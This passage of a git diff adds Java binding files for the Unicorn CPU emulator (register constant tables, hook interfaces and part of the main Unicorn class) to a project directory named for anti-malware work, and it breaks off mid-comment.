int UC_MIPS_REG_23 = 25; + public static final int UC_MIPS_REG_24 = 26; + public 
static final int UC_MIPS_REG_25 = 27; + public static final int UC_MIPS_REG_26 = 28; + public static final int UC_MIPS_REG_27 = 29; + public static final int UC_MIPS_REG_28 = 30; + public static final int UC_MIPS_REG_29 = 31; + public static final int UC_MIPS_REG_30 = 32; + public static final int UC_MIPS_REG_31 = 33; + +// DSP registers + public static final int UC_MIPS_REG_DSPCCOND = 34; + public static final int UC_MIPS_REG_DSPCARRY = 35; + public static final int UC_MIPS_REG_DSPEFI = 36; + public static final int UC_MIPS_REG_DSPOUTFLAG = 37; + public static final int UC_MIPS_REG_DSPOUTFLAG16_19 = 38; + public static final int UC_MIPS_REG_DSPOUTFLAG20 = 39; + public static final int UC_MIPS_REG_DSPOUTFLAG21 = 40; + public static final int UC_MIPS_REG_DSPOUTFLAG22 = 41; + public static final int UC_MIPS_REG_DSPOUTFLAG23 = 42; + public static final int UC_MIPS_REG_DSPPOS = 43; + public static final int UC_MIPS_REG_DSPSCOUNT = 44; + +// ACC registers + public static final int UC_MIPS_REG_AC0 = 45; + public static final int UC_MIPS_REG_AC1 = 46; + public static final int UC_MIPS_REG_AC2 = 47; + public static final int UC_MIPS_REG_AC3 = 48; + +// COP registers + public static final int UC_MIPS_REG_CC0 = 49; + public static final int UC_MIPS_REG_CC1 = 50; + public static final int UC_MIPS_REG_CC2 = 51; + public static final int UC_MIPS_REG_CC3 = 52; + public static final int UC_MIPS_REG_CC4 = 53; + public static final int UC_MIPS_REG_CC5 = 54; + public static final int UC_MIPS_REG_CC6 = 55; + public static final int UC_MIPS_REG_CC7 = 56; + +// FPU registers + public static final int UC_MIPS_REG_F0 = 57; + public static final int UC_MIPS_REG_F1 = 58; + public static final int UC_MIPS_REG_F2 = 59; + public static final int UC_MIPS_REG_F3 = 60; + public static final int UC_MIPS_REG_F4 = 61; + public static final int UC_MIPS_REG_F5 = 62; + public static final int UC_MIPS_REG_F6 = 63; + public static final int UC_MIPS_REG_F7 = 64; + public static final int UC_MIPS_REG_F8 = 
65; + public static final int UC_MIPS_REG_F9 = 66; + public static final int UC_MIPS_REG_F10 = 67; + public static final int UC_MIPS_REG_F11 = 68; + public static final int UC_MIPS_REG_F12 = 69; + public static final int UC_MIPS_REG_F13 = 70; + public static final int UC_MIPS_REG_F14 = 71; + public static final int UC_MIPS_REG_F15 = 72; + public static final int UC_MIPS_REG_F16 = 73; + public static final int UC_MIPS_REG_F17 = 74; + public static final int UC_MIPS_REG_F18 = 75; + public static final int UC_MIPS_REG_F19 = 76; + public static final int UC_MIPS_REG_F20 = 77; + public static final int UC_MIPS_REG_F21 = 78; + public static final int UC_MIPS_REG_F22 = 79; + public static final int UC_MIPS_REG_F23 = 80; + public static final int UC_MIPS_REG_F24 = 81; + public static final int UC_MIPS_REG_F25 = 82; + public static final int UC_MIPS_REG_F26 = 83; + public static final int UC_MIPS_REG_F27 = 84; + public static final int UC_MIPS_REG_F28 = 85; + public static final int UC_MIPS_REG_F29 = 86; + public static final int UC_MIPS_REG_F30 = 87; + public static final int UC_MIPS_REG_F31 = 88; + public static final int UC_MIPS_REG_FCC0 = 89; + public static final int UC_MIPS_REG_FCC1 = 90; + public static final int UC_MIPS_REG_FCC2 = 91; + public static final int UC_MIPS_REG_FCC3 = 92; + public static final int UC_MIPS_REG_FCC4 = 93; + public static final int UC_MIPS_REG_FCC5 = 94; + public static final int UC_MIPS_REG_FCC6 = 95; + public static final int UC_MIPS_REG_FCC7 = 96; + +// AFPR128 + public static final int UC_MIPS_REG_W0 = 97; + public static final int UC_MIPS_REG_W1 = 98; + public static final int UC_MIPS_REG_W2 = 99; + public static final int UC_MIPS_REG_W3 = 100; + public static final int UC_MIPS_REG_W4 = 101; + public static final int UC_MIPS_REG_W5 = 102; + public static final int UC_MIPS_REG_W6 = 103; + public static final int UC_MIPS_REG_W7 = 104; + public static final int UC_MIPS_REG_W8 = 105; + public static final int UC_MIPS_REG_W9 = 106; + public 
static final int UC_MIPS_REG_W10 = 107; + public static final int UC_MIPS_REG_W11 = 108; + public static final int UC_MIPS_REG_W12 = 109; + public static final int UC_MIPS_REG_W13 = 110; + public static final int UC_MIPS_REG_W14 = 111; + public static final int UC_MIPS_REG_W15 = 112; + public static final int UC_MIPS_REG_W16 = 113; + public static final int UC_MIPS_REG_W17 = 114; + public static final int UC_MIPS_REG_W18 = 115; + public static final int UC_MIPS_REG_W19 = 116; + public static final int UC_MIPS_REG_W20 = 117; + public static final int UC_MIPS_REG_W21 = 118; + public static final int UC_MIPS_REG_W22 = 119; + public static final int UC_MIPS_REG_W23 = 120; + public static final int UC_MIPS_REG_W24 = 121; + public static final int UC_MIPS_REG_W25 = 122; + public static final int UC_MIPS_REG_W26 = 123; + public static final int UC_MIPS_REG_W27 = 124; + public static final int UC_MIPS_REG_W28 = 125; + public static final int UC_MIPS_REG_W29 = 126; + public static final int UC_MIPS_REG_W30 = 127; + public static final int UC_MIPS_REG_W31 = 128; + public static final int UC_MIPS_REG_HI = 129; + public static final int UC_MIPS_REG_LO = 130; + public static final int UC_MIPS_REG_P0 = 131; + public static final int UC_MIPS_REG_P1 = 132; + public static final int UC_MIPS_REG_P2 = 133; + public static final int UC_MIPS_REG_MPL0 = 134; + public static final int UC_MIPS_REG_MPL1 = 135; + public static final int UC_MIPS_REG_MPL2 = 136; + public static final int UC_MIPS_REG_CP0_CONFIG3 = 137; + public static final int UC_MIPS_REG_CP0_USERLOCAL = 138; + public static final int UC_MIPS_REG_ENDING = 139; + public static final int UC_MIPS_REG_ZERO = 2; + public static final int UC_MIPS_REG_AT = 3; + public static final int UC_MIPS_REG_V0 = 4; + public static final int UC_MIPS_REG_V1 = 5; + public static final int UC_MIPS_REG_A0 = 6; + public static final int UC_MIPS_REG_A1 = 7; + public static final int UC_MIPS_REG_A2 = 8; + public static final int UC_MIPS_REG_A3 = 9; + 
public static final int UC_MIPS_REG_T0 = 10; + public static final int UC_MIPS_REG_T1 = 11; + public static final int UC_MIPS_REG_T2 = 12; + public static final int UC_MIPS_REG_T3 = 13; + public static final int UC_MIPS_REG_T4 = 14; + public static final int UC_MIPS_REG_T5 = 15; + public static final int UC_MIPS_REG_T6 = 16; + public static final int UC_MIPS_REG_T7 = 17; + public static final int UC_MIPS_REG_S0 = 18; + public static final int UC_MIPS_REG_S1 = 19; + public static final int UC_MIPS_REG_S2 = 20; + public static final int UC_MIPS_REG_S3 = 21; + public static final int UC_MIPS_REG_S4 = 22; + public static final int UC_MIPS_REG_S5 = 23; + public static final int UC_MIPS_REG_S6 = 24; + public static final int UC_MIPS_REG_S7 = 25; + public static final int UC_MIPS_REG_T8 = 26; + public static final int UC_MIPS_REG_T9 = 27; + public static final int UC_MIPS_REG_K0 = 28; + public static final int UC_MIPS_REG_K1 = 29; + public static final int UC_MIPS_REG_GP = 30; + public static final int UC_MIPS_REG_SP = 31; + public static final int UC_MIPS_REG_FP = 32; + public static final int UC_MIPS_REG_S8 = 32; + public static final int UC_MIPS_REG_RA = 33; + public static final int UC_MIPS_REG_HI0 = 45; + public static final int UC_MIPS_REG_HI1 = 46; + public static final int UC_MIPS_REG_HI2 = 47; + public static final int UC_MIPS_REG_HI3 = 48; + public static final int UC_MIPS_REG_LO0 = 45; + public static final int UC_MIPS_REG_LO1 = 46; + public static final int UC_MIPS_REG_LO2 = 47; + public static final int UC_MIPS_REG_LO3 = 48; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/OutHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/OutHook.java new file mode 100644 index 0000000..94c050f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/OutHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; 
you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface OutHook extends Hook { + + public void hook(Unicorn u, int port, int size, int value, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ReadHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ReadHook.java new file mode 100644 index 0000000..d522a63 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ReadHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +package unicorn; + +public interface ReadHook extends Hook { + + public void hook(Unicorn u, long address, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SparcConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SparcConst.java new file mode 100644 index 0000000..de0dc18 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SparcConst.java @@ -0,0 +1,102 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface SparcConst { + +// SPARC registers + + public static final int UC_SPARC_REG_INVALID = 0; + public static final int UC_SPARC_REG_F0 = 1; + public static final int UC_SPARC_REG_F1 = 2; + public static final int UC_SPARC_REG_F2 = 3; + public static final int UC_SPARC_REG_F3 = 4; + public static final int UC_SPARC_REG_F4 = 5; + public static final int UC_SPARC_REG_F5 = 6; + public static final int UC_SPARC_REG_F6 = 7; + public static final int UC_SPARC_REG_F7 = 8; + public static final int UC_SPARC_REG_F8 = 9; + public static final int UC_SPARC_REG_F9 = 10; + public static final int UC_SPARC_REG_F10 = 11; + public static final int UC_SPARC_REG_F11 = 12; + public static final int UC_SPARC_REG_F12 = 13; + public static final int UC_SPARC_REG_F13 = 14; + public static final int UC_SPARC_REG_F14 = 15; + public static final int UC_SPARC_REG_F15 = 16; + public static final int UC_SPARC_REG_F16 = 17; + public static final int UC_SPARC_REG_F17 = 18; + public static final int UC_SPARC_REG_F18 = 19; + public static final int UC_SPARC_REG_F19 = 20; + public static final int UC_SPARC_REG_F20 = 21; + public static final int UC_SPARC_REG_F21 = 22; + public static final int UC_SPARC_REG_F22 = 23; + public static final int UC_SPARC_REG_F23 = 24; + public static final int UC_SPARC_REG_F24 = 25; + public static final int UC_SPARC_REG_F25 = 26; + public static final int UC_SPARC_REG_F26 = 27; + public static final int 
UC_SPARC_REG_F27 = 28; + public static final int UC_SPARC_REG_F28 = 29; + public static final int UC_SPARC_REG_F29 = 30; + public static final int UC_SPARC_REG_F30 = 31; + public static final int UC_SPARC_REG_F31 = 32; + public static final int UC_SPARC_REG_F32 = 33; + public static final int UC_SPARC_REG_F34 = 34; + public static final int UC_SPARC_REG_F36 = 35; + public static final int UC_SPARC_REG_F38 = 36; + public static final int UC_SPARC_REG_F40 = 37; + public static final int UC_SPARC_REG_F42 = 38; + public static final int UC_SPARC_REG_F44 = 39; + public static final int UC_SPARC_REG_F46 = 40; + public static final int UC_SPARC_REG_F48 = 41; + public static final int UC_SPARC_REG_F50 = 42; + public static final int UC_SPARC_REG_F52 = 43; + public static final int UC_SPARC_REG_F54 = 44; + public static final int UC_SPARC_REG_F56 = 45; + public static final int UC_SPARC_REG_F58 = 46; + public static final int UC_SPARC_REG_F60 = 47; + public static final int UC_SPARC_REG_F62 = 48; + public static final int UC_SPARC_REG_FCC0 = 49; + public static final int UC_SPARC_REG_FCC1 = 50; + public static final int UC_SPARC_REG_FCC2 = 51; + public static final int UC_SPARC_REG_FCC3 = 52; + public static final int UC_SPARC_REG_G0 = 53; + public static final int UC_SPARC_REG_G1 = 54; + public static final int UC_SPARC_REG_G2 = 55; + public static final int UC_SPARC_REG_G3 = 56; + public static final int UC_SPARC_REG_G4 = 57; + public static final int UC_SPARC_REG_G5 = 58; + public static final int UC_SPARC_REG_G6 = 59; + public static final int UC_SPARC_REG_G7 = 60; + public static final int UC_SPARC_REG_I0 = 61; + public static final int UC_SPARC_REG_I1 = 62; + public static final int UC_SPARC_REG_I2 = 63; + public static final int UC_SPARC_REG_I3 = 64; + public static final int UC_SPARC_REG_I4 = 65; + public static final int UC_SPARC_REG_I5 = 66; + public static final int UC_SPARC_REG_FP = 67; + public static final int UC_SPARC_REG_I7 = 68; + public static final int 
UC_SPARC_REG_ICC = 69; + public static final int UC_SPARC_REG_L0 = 70; + public static final int UC_SPARC_REG_L1 = 71; + public static final int UC_SPARC_REG_L2 = 72; + public static final int UC_SPARC_REG_L3 = 73; + public static final int UC_SPARC_REG_L4 = 74; + public static final int UC_SPARC_REG_L5 = 75; + public static final int UC_SPARC_REG_L6 = 76; + public static final int UC_SPARC_REG_L7 = 77; + public static final int UC_SPARC_REG_O0 = 78; + public static final int UC_SPARC_REG_O1 = 79; + public static final int UC_SPARC_REG_O2 = 80; + public static final int UC_SPARC_REG_O3 = 81; + public static final int UC_SPARC_REG_O4 = 82; + public static final int UC_SPARC_REG_O5 = 83; + public static final int UC_SPARC_REG_SP = 84; + public static final int UC_SPARC_REG_O7 = 85; + public static final int UC_SPARC_REG_Y = 86; + public static final int UC_SPARC_REG_XCC = 87; + public static final int UC_SPARC_REG_PC = 88; + public static final int UC_SPARC_REG_ENDING = 89; + public static final int UC_SPARC_REG_O6 = 84; + public static final int UC_SPARC_REG_I6 = 67; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SyscallHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SyscallHook.java new file mode 100644 index 0000000..5b08a11 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SyscallHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. 
+ +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface SyscallHook extends Hook { + + public void hook(Unicorn u, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Unicorn.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Unicorn.java new file mode 100644 index 0000000..279fdbb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Unicorn.java @@ -0,0 +1,825 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +package unicorn; + +import java.util.*; + +public class Unicorn implements UnicornConst, ArmConst, Arm64Const, M68kConst, SparcConst, MipsConst, X86Const { + + private long eng; + private int arch; + private int mode; + + private long blockHandle = 0; + private long interruptHandle = 0; + private long codeHandle = 0; + + private Hashtable eventMemHandles = new Hashtable(); + private long readInvalidHandle = 0; + private long writeInvalidHandle = 0; + private long fetchProtHandle = 0; + private long readProtHandle = 0; + private long writeProtHandle = 0; + + private long readHandle = 0; + private long writeHandle = 0; + private long inHandle = 0; + private long outHandle = 0; + private long syscallHandle = 0; + + private class Tuple { + public Hook function; + public Object data; + public Tuple(Hook f, Object d) { + function = f; + data = d; + } + } + + private ArrayList blockList = new ArrayList(); + private ArrayList intrList = new ArrayList(); + private ArrayList codeList = new ArrayList(); + private ArrayList readList = new ArrayList(); + private ArrayList writeList = new ArrayList(); + private ArrayList inList = new ArrayList(); + private ArrayList outList = new ArrayList(); + private ArrayList syscallList = new ArrayList(); + + private Hashtable > eventMemLists = new Hashtable >(); + + private ArrayList> allLists = new ArrayList>(); + + private static Hashtable eventMemMap = new Hashtable(); + private static Hashtable unicorns = new Hashtable(); + + //required to load native method implementations + static { + System.loadLibrary("unicorn_java"); //loads unicorn.dll or libunicorn.so + eventMemMap.put(UC_HOOK_MEM_READ_UNMAPPED, UC_MEM_READ_UNMAPPED); + eventMemMap.put(UC_HOOK_MEM_WRITE_UNMAPPED, UC_MEM_WRITE_UNMAPPED); + eventMemMap.put(UC_HOOK_MEM_FETCH_UNMAPPED, UC_MEM_FETCH_UNMAPPED); + eventMemMap.put(UC_HOOK_MEM_READ_PROT, UC_MEM_READ_PROT); + eventMemMap.put(UC_HOOK_MEM_WRITE_PROT, UC_MEM_WRITE_PROT); + eventMemMap.put(UC_HOOK_MEM_FETCH_PROT, 
UC_MEM_FETCH_PROT); + eventMemMap.put(UC_HOOK_MEM_READ, UC_MEM_READ); + eventMemMap.put(UC_HOOK_MEM_WRITE, UC_MEM_WRITE); + eventMemMap.put(UC_HOOK_MEM_FETCH, UC_MEM_FETCH); + eventMemMap.put(UC_HOOK_MEM_READ_AFTER, UC_MEM_READ_AFTER); + } + +/** + * Invoke all UC_HOOK_BLOCK callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_BLOCK + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address The address of the instruction being executed + * @param size The size of the basic block being executed + * @see hook_add, unicorn.BlockHook + */ + private static void invokeBlockCallbacks(long eng, long address, int size) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.blockList) { + BlockHook bh = (BlockHook)p.function; + bh.hook(u, address, size, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_INTR callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_INTR + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param intno The interrupt number + * @see hook_add, unicorn.InterruptHook + */ + private static void invokeInterruptCallbacks(long eng, int intno) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.intrList) { + InterruptHook ih = (InterruptHook)p.function; + ih.hook(u, intno, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_CODE callbacks registered for a specific Unicorn. 
+ * This function gets invoked from the native C callback registered for + * for UC_HOOK_CODE + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address The address of the instruction being executed + * @param size The size of the instruction being executed + * @see hook_add, unicorn.CodeHook + */ + private static void invokeCodeCallbacks(long eng, long address, int size) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.codeList) { + CodeHook ch = (CodeHook)p.function; + ch.hook(u, address, size, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_MEM_XXX_UNMAPPED and/or UC_HOOK_MEM_XXX_PROT callbacks registered + * for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_MEM_XXX_UNMAPPED or UC_HOOK_MEM_XXX_PROT + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param type The type of event that is taking place + * @param address Address of instruction being executed + * @param size Size of data being read or written + * @param value Value of data being written to memory, or irrelevant if type = READ. + * @return true to continue, or false to stop program (due to invalid memory). + * @see hook_add, unicorn.EventMemHook + */ + private static boolean invokeEventMemCallbacks(long eng, int type, long address, int size, long value) { + Unicorn u = unicorns.get(eng); + boolean result = true; + if (u != null) { + ArrayList funcList = u.eventMemLists.get(type); + if (funcList != null) { + for (Tuple p : funcList) { + EventMemHook emh = (EventMemHook)p.function; + result &= emh.hook(u, address, size, value, p.data); + } + } + } + return result; + } + +/** + * Invoke all UC_HOOK_MEM_READ callbacks registered for a specific Unicorn. 
+ * This function gets invoked from the native C callback registered for + * for UC_HOOK_MEM_READ + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address Address of instruction being executed + * @param size Size of data being read + * @see hook_add, unicorn.ReadHook + */ + private static void invokeReadCallbacks(long eng, long address, int size) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.readList) { + ReadHook rh = (ReadHook)p.function; + rh.hook(u, address, size, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_MEM_WRITE callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_MEM_WRITE + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address Address of instruction being executed + * @param size Size of data being read + * @param value value being written + * @see hook_add, unicorn.WriteHook + */ + private static void invokeWriteCallbacks(long eng, long address, int size, long value) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.writeList) { + WriteHook wh = (WriteHook)p.function; + wh.hook(u, address, size, value, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_INSN callbacks registered for a specific Unicorn. + * This is specifically for the x86 IN instruction. 
+ * This function gets invoked from the native C callback registered for + * for UC_HOOK_INSN + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param port I/O Port number + * @param size Data size (1/2/4) to be read from this port + * @return Data supplied from the input port + * @see hook_add, unicorn.InHook + */ + private static int invokeInCallbacks(long eng, int port, int size) { + Unicorn u = unicorns.get(eng); + int result = 0; + if (u != null) { + for (Tuple p : u.inList) { + InHook ih = (InHook)p.function; + result = ih.hook(u, port, size, p.data); + } + } + return result; + } + +/** + * Invoke all UC_HOOK_INSN callbacks registered for a specific Unicorn. + * This is specifically for the x86 OUT instruction. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_INSN + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param port I/O Port number + * @param size Data size (1/2/4) to be written to this port + * @see hook_add, unicorn.OutHook + */ + private static void invokeOutCallbacks(long eng, int port, int size, int value) { + Unicorn u = unicorns.get(eng); + int result = 0; + if (u != null) { + for (Tuple p : u.outList) { + OutHook oh = (OutHook)p.function; + oh.hook(u, port, size, value, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_INSN callbacks registered for a specific Unicorn. + * This is specifically for the x86 SYSCALL and SYSENTER instruction. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_INSN + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @see hook_add, unicorn.SyscallHook + */ + private static void invokeSyscallCallbacks(long eng) { + Unicorn u = unicorns.get(eng); + int result = 0; + if (u != null) { + for (Tuple p : u.syscallList) { + SyscallHook sh = (SyscallHook)p.function; + sh.hook(u, p.data); + } + } + } + +/** + * Write to register. + * + * @param regid Register ID that is to be modified. 
+ * @param value Number containing the new register value + */ + private native void reg_write_num(int regid, Number value) throws UnicornException; + +/** + * Write to register. + * + * @param regid Register ID that is to be modified. + * @param value X86 specific memory management register containing the new register value + */ + private native void reg_write_mmr(int regid, X86_MMR value) throws UnicornException; + +/** + * Read register value. + * + * @param regid Register ID that is to be retrieved. + * @return Number containing the requested register value. + */ + private native Number reg_read_num(int regid) throws UnicornException; + +/** + * Read register value. + * + * @param regid Register ID that is to be retrieved. + * @return X86_MMR containing the requested register value. + */ + private native Number reg_read_mmr(int regid) throws UnicornException; + +/** + * Native access to uc_open + * + * @param arch Architecture type (UC_ARCH_*) + * @param mode Hardware mode. This is combined of UC_MODE_* + */ + private native long open(int arch, int mode) throws UnicornException; + +/** + * Create a new Unicorn object + * + * @param arch Architecture type (UC_ARCH_*) + * @param mode Hardware mode. This is combined of UC_MODE_* + * @see unicorn.UnicornConst + * + */ + public Unicorn(int arch, int mode) throws UnicornException { + //remember these in case we need arch specific code + this.arch = arch; + this.mode = mode; + eng = open(arch, mode); + unicorns.put(eng, this); + allLists.add(blockList); + allLists.add(intrList); + allLists.add(codeList); + allLists.add(readList); + allLists.add(writeList); + allLists.add(inList); + allLists.add(outList); + allLists.add(syscallList); + } + +/** + * Perform native cleanup tasks associated with a Unicorn object + * + */ + protected void finalize() { + unicorns.remove(eng); + close(); + } + +/** + * Return combined API version & major and minor version numbers. 
+ * + * @return hexadecimal number as (major << 8 | minor), which encodes both major & minor versions. + * + * For example Unicorn version 1.2 whould yield 0x0102 + */ + public native static int version(); + +/** + * Determine if the given architecture is supported by this library. + * + * @param arch Architecture type (UC_ARCH_*) + * @return true if this library supports the given arch. + * @see unicorn.UnicornConst + */ + public native static boolean arch_supported(int arch); + +/** + * Close the underlying uc_engine* eng associated with this Unicorn object + * + */ + public native void close() throws UnicornException; + +/** + * Query internal status of engine. + * + * @param type query type. See UC_QUERY_* + * @param result save the internal status queried + * + * @return: error code. see UC_ERR_* + * @see unicorn.UnicornConst + */ + public native int query(int type) throws UnicornException; + +/** + * Report the last error number when some API function fail. + * Like glibc's errno, uc_errno might not retain its old value once accessed. + * + * @return Error code of uc_err enum type (UC_ERR_*, see above) + * @see unicorn.UnicornConst + */ + public native int errno(); + +/** + * Return a string describing given error code. + * + * @param code Error code (see UC_ERR_* above) + * @return Returns a String that describes the error code + * @see unicorn.UnicornConst + */ + public native static String strerror(int code); + +/** + * Write to register. + * + * @deprecated use reg_write(int regid, Object value) instead + * @param regid Register ID that is to be modified. + * @param value Array containing value that will be written into register @regid + */ +@Deprecated + public native void reg_write(int regid, byte[] value) throws UnicornException; + +/** + * Write to register. + * + * @param regid Register ID that is to be modified. + * @param value Object containing the new register value. 
Long, BigInteger, or + * other custom class used to represent register values + */ + public void reg_write(int regid, Object value) throws UnicornException { + if (value instanceof Number) { + reg_write_num(regid, (Number)value); + } + else if (arch == UC_ARCH_X86 && value instanceof X86_MMR) { + if (regid >= UC_X86_REG_IDTR && regid <= UC_X86_REG_TR) { + reg_write_mmr(regid, (X86_MMR)value); + } + } + else { + throw new ClassCastException("Invalid value type"); + } + } + +/** + * Read register value. + * + * @deprecated use Object reg_read(int regid) instead + * @param regid Register ID that is to be retrieved. + * @param regsz Size of the register being retrieved. + * @return Byte array containing the requested register value. + */ +@Deprecated + public native byte[] reg_read(int regid, int regsz) throws UnicornException; + +/** + * Read register value. + * + * @param regid Register ID that is to be retrieved. + * @return Object containing the requested register value. Long, BigInteger, or + * other custom class used to represent register values + */ + public Object reg_read(int regid) throws UnicornException { + if (arch == UC_ARCH_X86 && regid >= UC_X86_REG_IDTR && regid <= UC_X86_REG_TR) { + return reg_read_mmr(regid); + } + else { + return reg_read_num(regid); + } + } + +/** + * Batch write register values. regids.length == vals.length or UC_ERR_ARG + * + * @param regids Array of register IDs to be written. + * @param vals Array of register values to be written. + */ + public void reg_write_batch(int regids[], Object vals[]) throws UnicornException { + if (regids.length != vals.length) { + throw new UnicornException(strerror(UC_ERR_ARG)); + } + for (int i = 0; i < regids.length; i++) { + reg_write(regids[i], vals[i]); + } + } + +/** + * Batch read register values. + * + * @param regids Array of register IDs to be read. + * @return Array containing the requested register values. 
+ */ + public Object[] reg_read_batch(int regids[]) throws UnicornException { + Object[] vals = new Object[regids.length]; + for (int i = 0; i < regids.length; i++) { + vals[i] = reg_read(regids[i]); + } + return vals; + } + +/** + * Write to memory. + * + * @param address Start addres of the memory region to be written. + * @param bytes The values to be written into memory. bytes.length bytes will be written. + */ + public native void mem_write(long address, byte[] bytes) throws UnicornException; + +/** + * Read memory contents. + * + * @param address Start addres of the memory region to be read. + * @param size Number of bytes to be retrieved. + * @return Byte array containing the contents of the requested memory range. + */ + public native byte[] mem_read(long address, long size) throws UnicornException; + +/** + * Emulate machine code in a specific duration of time. + * + * @param begin Address where emulation starts + * @param until Address where emulation stops (i.e when this address is hit) + * @param timeout Duration to emulate the code (in microseconds). When this value is 0, we will emulate the code in infinite time, until the code is finished. + * @param count The number of instructions to be emulated. When this value is 0, we will emulate all the code available, until the code is finished. + */ + public native void emu_start(long begin, long until, long timeout, long count) throws UnicornException; + +/** + * Stop emulation (which was started by emu_start() ). + * This is typically called from callback functions registered via tracing APIs. + * NOTE: for now, this will stop the execution only after the current block. + */ + public native void emu_stop() throws UnicornException; + +/** + * Hook registration helper for hook types that require no additional arguments. 
+ * + * @param eng Internal unicorn uc_engine* eng associated with hooking Unicorn object + * @param type UC_HOOK_* hook type + * @return Unicorn uch returned for registered hook function + */ + private native static long registerHook(long eng, int type); + +/** + * Hook registration helper for hook types that require one additional argument. + * + * @param eng Internal unicorn uc_engine* eng associated with hooking Unicorn object + * @param type UC_HOOK_* hook type + * @param arg1 Additional varargs argument + * @return Unicorn uch returned for registered hook function + */ + private native static long registerHook(long eng, int type, int arg1); + +/** + * Hook registration helper for hook types that require two additional arguments. + * + * @param eng Internal unicorn uc_engine* eng associated with hooking Unicorn object + * @param type UC_HOOK_* hook type + * @param arg1 First additional varargs argument + * @param arg2 Second additional varargs argument + * @return Unicorn uch returned for registered hook function + */ + private native static long registerHook(long eng, int type, long arg1, long arg2); + +/** + * Hook registration for UC_HOOK_BLOCK hooks. The registered callback function will be + * invoked when a basic block is entered and the address of the basic block (BB) falls in the + * range begin <= 